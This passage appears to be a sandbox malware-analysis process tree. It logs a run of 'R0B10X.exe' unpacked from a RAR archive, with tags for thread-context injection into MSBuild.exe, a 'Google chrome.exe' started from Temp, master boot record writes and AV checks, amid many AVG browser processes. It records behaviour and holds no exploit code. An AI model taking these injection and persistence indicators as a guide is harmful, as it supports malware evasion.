\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc1⤵PID:4484
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService1⤵PID:2844
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc1⤵PID:11284
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3524
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /c1⤵PID:8776
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /cr2⤵
- Modifies data under HKEY_USERS
PID:11176
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe"2⤵PID:3340
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe"2⤵PID:10476
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ua /installsource scheduler1⤵
- Modifies data under HKEY_USERS
PID:11084 -
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /registermsihelper2⤵PID:9176
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:8592
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc1⤵
- Writes to the Master Boot Record (MBR)
- Modifies data under HKEY_USERS
PID:11584
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:11448
-
C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"C:\Program Files\AVG\Browser\Application\124.0.25039.207\elevation_service.exe"1⤵PID:11040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s NgcSvc1⤵PID:13092
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService1⤵PID:13156
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\R0B10X.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:11688
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\R0B10X.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:11800
-
C:\Users\Admin\Desktop\R0B10X\R0B10X.exe"C:\Users\Admin\Desktop\R0B10X\R0B10X.exe"1⤵
- Suspicious use of SetThreadContext
PID:10348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵PID:7688
-
-
C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google chrome.exe"1⤵PID:12644
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --check-run=src=desktop1⤵
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:13056 -
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff992c7dc40,0x7ff992c7dc4c,0x7ff992c7dc582⤵PID:9232
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=1840 /prefetch:22⤵PID:13076
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:32⤵PID:13240
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1720,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:82⤵PID:13144
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2964,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=2984 /prefetch:12⤵PID:8380
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2972,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3016 /prefetch:22⤵PID:9416
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=1540,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:22⤵PID:6680
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=shortcut-pin-helper /prefetch:8 has-startpin "C:\Users\Public\Desktop\AVG Secure Browser.lnk"2⤵PID:12176
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4884 /prefetch:82⤵PID:5696
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3544,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4628 /prefetch:82⤵PID:1840
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:82⤵PID:9768
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3784,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:82⤵PID:12804
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5236,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:82⤵PID:7812
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:82⤵PID:10092
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5672,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5668 /prefetch:82⤵PID:9036
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5652,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5816 /prefetch:82⤵PID:5052
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5960,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:5416
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5648,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4280 /prefetch:82⤵PID:12228
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5676,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:82⤵PID:8424
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6316,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:82⤵PID:7904
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6320,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6648 /prefetch:82⤵PID:8708
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6636,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:82⤵PID:13032
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6916,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:82⤵PID:12412
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7080,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:82⤵PID:11752
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7072,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7076 /prefetch:82⤵PID:7160
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6624,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7260 /prefetch:82⤵PID:7316
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7084,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:82⤵PID:9896
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7652,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7668 /prefetch:82⤵PID:10472
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7500,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7488 /prefetch:82⤵PID:7568
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7532,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6920 /prefetch:82⤵PID:6028
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4480,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7372 /prefetch:82⤵PID:11604
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --disable-protect2⤵PID:7140
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\AVG\Browser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\AVG\Browser\User Data" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0xe4,0xe8,0xec,0xc0,0xf0,0x7ff992c7dc40,0x7ff992c7dc4c,0x7ff992c7dc583⤵PID:9072
-
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7540,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8072 /prefetch:12⤵PID:4960
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5400,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6640 /prefetch:12⤵PID:12588
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5492,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7496 /prefetch:82⤵PID:13276
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7440,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8004 /prefetch:82⤵PID:12620
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5424,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:12⤵PID:10296
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=4956,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:6720
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=5004,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:12⤵
- Checks computer location settings
PID:4132
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=8044,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3064 /prefetch:12⤵PID:8064
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=7880,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:9840
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=7632,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7348 /prefetch:12⤵
- Checks computer location settings
PID:9320
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=5032,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:12⤵
- Checks computer location settings
PID:8500
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7488,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:12⤵PID:5448
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=7300,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7332 /prefetch:12⤵PID:7568
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=6092,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3012 /prefetch:12⤵PID:10368
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3084,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7576 /prefetch:82⤵PID:4208
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=6072,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:12⤵
- Checks computer location settings
PID:1644
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=5052,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:12⤵PID:3220
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7236,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:82⤵PID:9264
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=3000,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7664 /prefetch:12⤵PID:8316
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=3136,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:2360
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=7256,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:82⤵PID:3616
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6356,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=4960 /prefetch:12⤵PID:6864
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5844,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7664 /prefetch:82⤵PID:12124
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=7896,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=8060 /prefetch:12⤵PID:9308
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7752,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:82⤵PID:11444
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=3176,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:12⤵PID:11732
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=7152,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:12⤵PID:4152
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=7696,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=7204 /prefetch:12⤵PID:8744
-
-
C:\Program Files\AVG\Browser\Application\AVGBrowser.exe"C:\Program Files\AVG\Browser\Application\AVGBrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=3192,i,14589572775857304541,217178850456453300,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:6488
-
-
